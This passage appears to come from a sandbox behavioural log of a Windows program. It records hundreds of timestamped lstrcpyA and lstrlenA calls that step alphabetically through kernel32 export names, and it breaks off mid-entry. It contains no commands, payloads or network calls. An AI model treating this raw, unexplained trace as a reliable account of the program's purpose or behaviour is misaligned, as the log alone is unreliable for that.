lpString1=0x8decf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0158.055] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0158.055] lstrcpyA (in: lpString1=0x8decf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0158.055] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0158.055] lstrcpyA (in: lpString1=0x8decf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0158.055] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0158.055] lstrcpyA (in: lpString1=0x8decf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0158.055] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0158.055] lstrcpyA (in: lpString1=0x8decf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0158.055] lstrlenA (lpString="BACKUPREAD") returned 10 [0158.055] lstrcpyA (in: lpString1=0x8decf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0158.055] lstrlenA (lpString="BACKUPSEEK") returned 10 [0158.055] lstrcpyA (in: lpString1=0x8decf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0158.055] lstrlenA (lpString="BACKUPWRITE") returned 11 [0158.055] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0158.055] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0158.055] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0158.055] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0158.055] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0158.056] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0158.056] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0158.056] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0158.056] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0158.056] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0158.056] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0158.056] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0158.056] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0158.056] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0158.056] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0158.056] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0158.056] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0158.056] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0158.056] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0158.056] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0158.056] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0158.056] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0158.056] lstrcpyA (in: lpString1=0x8decf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0158.056] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0158.057] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0158.057] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0158.057] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0158.057] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0158.057] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0158.057] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0158.057] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0158.057] lstrlenA (lpString="BEEP") returned 4 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0158.057] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0158.057] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0158.057] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0158.057] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0158.057] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0158.057] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0158.057] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0158.057] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0158.057] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0158.057] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0158.057] lstrcpyA (in: lpString1=0x8decf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0158.058] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0158.058] lstrlenA (lpString="CANCELIO") returned 8 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0158.058] lstrlenA (lpString="CANCELIOEX") returned 10 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0158.058] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0158.058] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0158.058] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0158.058] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0158.058] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0158.058] lstrlenA (lpString="CHECKELEVATION") returned 14 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0158.058] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0158.058] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0158.058] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0158.058] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0158.058] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0158.058] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0158.058] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0158.058] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0158.058] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0158.058] lstrcpyA (in: lpString1=0x8decf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0158.058] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0158.059] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0158.059] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0158.059] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0158.059] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0158.059] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0158.059] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0158.059] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0158.059] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0158.059] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0158.059] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0158.059] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0158.059] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0158.059] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0158.059] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0158.059] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0158.059] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0158.059] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0158.059] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0158.059] lstrcpyA (in: lpString1=0x8decf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0158.060] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0158.060] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0158.060] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0158.060] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0158.060] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0158.060] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0158.060] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0158.060] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0158.060] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0158.060] lstrlenA (lpString="COPYCONTEXT") returned 11 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0158.060] lstrlenA (lpString="COPYFILEA") returned 9 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0158.060] lstrlenA (lpString="COPYFILEEXA") returned 11 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0158.060] lstrlenA (lpString="COPYFILEEXW") returned 11 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0158.060] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0158.060] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0158.060] lstrlenA (lpString="COPYFILEW") returned 9 [0158.060] lstrcpyA (in: lpString1=0x8decf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0158.061] lstrlenA (lpString="COPYLZFILE") returned 10 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0158.061] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0158.061] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0158.061] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0158.061] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0158.061] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0158.061] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0158.061] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0158.061] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0158.061] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0158.061] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0158.061] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0158.061] lstrlenA (lpString="CREATEEVENTA") returned 12 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0158.061] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0158.061] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0158.061] lstrlenA (lpString="CREATEEVENTW") returned 12 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0158.061] lstrlenA (lpString="CREATEFIBER") returned 11 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0158.061] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0158.061] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0158.061] lstrlenA (lpString="CREATEFILEA") returned 11 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0158.062] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0158.062] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0158.062] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0158.062] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0158.062] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0158.062] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0158.062] lstrlenA (lpString="CREATEFILEW") returned 11 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0158.062] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0158.062] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0158.062] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0158.062] lstrcpyA 